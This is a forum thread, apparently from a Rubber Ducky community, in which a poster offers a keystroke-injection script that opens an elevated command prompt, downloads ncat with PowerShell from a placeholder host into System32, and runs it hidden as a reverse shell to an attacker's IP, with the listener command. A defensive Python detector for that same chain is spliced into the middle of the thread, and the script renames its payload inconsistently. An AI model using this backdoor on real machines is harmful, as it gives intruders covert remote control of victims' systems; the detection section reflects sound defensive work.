Grimsoul Posted November 7, 2014

Just picked up my Rubber Ducky and thought I'd contribute a bit. (First post btw, hi!)

So we all know that netcat gets picked up by most anti-virus (a ratio of about 23/53), which makes using it as a backdoor slightly challenging. After doing some reading, I figured out that ncat (by nmap), a modernized version of netcat, only had a ratio of 4/53 and was undetected by a lot of major anti-virus programs. So here is a (relatively) undetected backdoor to any Windows 7 machine, coded from scratch by yours truly. By no means complicated or innovative at all.

For this attack, we download a copy of ncat on the victim's machine and run it silently. You can pick up a portable exe of ncat straight from the developer's website (1.5 MB) here. ncat, unlike netcat, doesn't run in the background (it requires a cmd to be open to keep the connection alive), so I used some crafty PowerShell arguments to force it into the background. The rest is explained in the comments.

You can compare the AV results between netcat and ncat here: VirusTotal ncat results (picked up by Norton though, sucks I know) VirusTotal netcat results

Please feel free to adapt this for your own tailored needs, be it persistence, no-download (Twin Duck) or hidden cmd window.

- GrimsouL

REM --Windows shell undetected by AV (Ncat Download required) WIN7/UAC-- by: GrimSouL 11/7/2014
REM //This delay required on my PC before attempting to get start menu, may not be required on yours/target.
DELAY 1000
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
REM //This delay is long because on my machine right clicking certain things takes a long time (many menu options), adjust as needed.
DELAY 1000
STRING a
DELAY 200
REM //This enter required for my PC, I've seen a lot of scripts where this is omitted but the 'a' above only selects the 'Run as admin' on my machine, hence we need an enter to actually 'click' it
ENTER
REM //This delay may need to be adjusted depending on machine. Sometimes takes long due to background dimming
DELAY 700
LEFTARROW
DELAY 400
ENTER
DELAY 700
REM //Simple powershell to download ncat portable. You can see it's a .txt extension because most hosters don't allow .exe files. So we change the extension of ncat to a .txt and upload it, then rename it back to an exe after download
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://yourhost.com/yourPayload.txt','%WINDIR%\System32\yourPayload.exe')
ENTER
REM //This delay is set to 10 seconds to wait for the downloaded file. Adjust as needed for your/target's connection speed. (ncat = 1.58MB)
DELAY 10000
ENTER
REM //Where the magic happens, we run the downloaded ncat exe; since ncat doesn't run in the background, we use a powershell argument to make it so.
STRING powershell Start-Process -WindowStyle hidden -FilePath %WINDIR%\System32\payloadEn.exe -ArgumentList '<attackerIP> <attackerPORT> -e cmd.exe'
ENTER
REM // We exit our powershell, however ncat runs silently leaving us with a clean getaway
STRING exit
ENTER

To run our listener on the attacker machine:

ncat -l <ATTACKER IP> -p <ATTACKER PORT> -v
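From the defender's side, the chain in the post above leaves a very recognisable trail in process-creation telemetry: a PowerShell one-liner calling System.Net.WebClient.DownloadFile into System32, a second PowerShell call using Start-Process -WindowStyle hidden, and finally a child process carrying -e cmd.exe on its command line. The following is an added example, not code from the post or from the Hak5 or nmap projects, showing how those three stages can be matched in a set of process-creation events. The event dictionaries and their field names (Image, ParentImage, CommandLine, IntegrityLevel) are modelled loosely on Sysmon Event ID 1 and the sample values, including the host 198.51.100.7 and port 4444, are constructed for the demo.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (not real telemetry). The middle
# three mirror the download -> hidden launch -> ncat child sequence from the post;
# the others are benign filler to show the rules do not fire on ordinary activity.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd", "IntegrityLevel": "High"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell (new-object System.Net.WebClient).DownloadFile("
                    r"'http://yourhost.com/yourPayload.txt','C:\Windows\System32\yourPayload.exe')",
     "IntegrityLevel": "High"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell Start-Process -WindowStyle hidden -FilePath "
                    r"C:\Windows\System32\payloadEn.exe -ArgumentList '198.51.100.7 4444 -e cmd.exe'",
     "IntegrityLevel": "High"},
    {"Image": r"C:\Windows\System32\payloadEn.exe", "ParentImage": PS,
     "CommandLine": r"C:\Windows\System32\payloadEn.exe 198.51.100.7 4444 -e cmd.exe",
     "IntegrityLevel": "High"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell Get-ChildItem C:\Users", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c echo -e hello", "IntegrityLevel": "Medium"},
]

# Detection rules as (name, regex over the command line). Each one describes a
# stage of the chain discussed in the post rather than a particular file name,
# so renaming the dropped binary does not evade them.
RULES = [
    ("powershell_webclient_download",
     re.compile(r"System\.Net\.WebClient\)?\s*\.\s*DownloadFile", re.IGNORECASE)),
    ("download_written_to_system32",
     re.compile(r"DownloadFile\s*\([^)]*\\System32\\", re.IGNORECASE)),
    ("powershell_hidden_start_process",
     re.compile(r"Start-Process\b.*-WindowStyle\s+hidden", re.IGNORECASE)),
    # "-e" followed by a shell is the classic netcat/ncat "execute a program" flag.
    ("exec_flag_spawns_shell",
     re.compile(r"(^|\s)-e\s+['\"]?(cmd(\.exe)?|powershell(\.exe)?|/bin/(ba)?sh)\b",
                re.IGNORECASE)),
]


def scan_events(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per event whose command line matches at least one rule."""
    findings: List[Dict[str, object]] = []
    for idx, ev in enumerate(events):
        cmd = ev.get("CommandLine", "")
        hits = [name for name, pattern in RULES if pattern.search(cmd)]
        if hits:
            findings.append({"event": idx, "image": ev.get("Image", ""),
                             "parent": ev.get("ParentImage", ""), "rules": hits})
    return findings


def chain_detected(findings: List[Dict[str, object]]) -> bool:
    """True when a WebClient download is followed later by a hidden Start-Process."""
    download_at = [f["event"] for f in findings if "powershell_webclient_download" in f["rules"]]
    hidden_at = [f["event"] for f in findings if "powershell_hidden_start_process" in f["rules"]]
    return bool(download_at) and bool(hidden_at) and min(download_at) < max(hidden_at)


if __name__ == "__main__":
    results = scan_events(SAMPLE_EVENTS)
    for f in results:
        print(f"event {f['event']}: {f['image']} <- {f['parent']}: {', '.join(f['rules'])}")
    print("download-then-hidden-launch chain:", chain_detected(results))
```

The rules key on behaviour (a .NET download primitive writing under System32, a hidden-window launch, an -e shell argument) rather than on the file names in the post, and the last benign event shows that a bare "-e" not followed by a shell does not trigger. In practice these would run over real Sysmon or EDR process-creation logs, with the parent/child relationship (cmd.exe at High integrity spawning PowerShell, PowerShell spawning an unknown System32 binary) used to raise the severity of a combined hit.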
Grimsoul Posted November 8, 2014 (Author)

This also works on x64 machines, unlike the base64 payload that uses a VB script.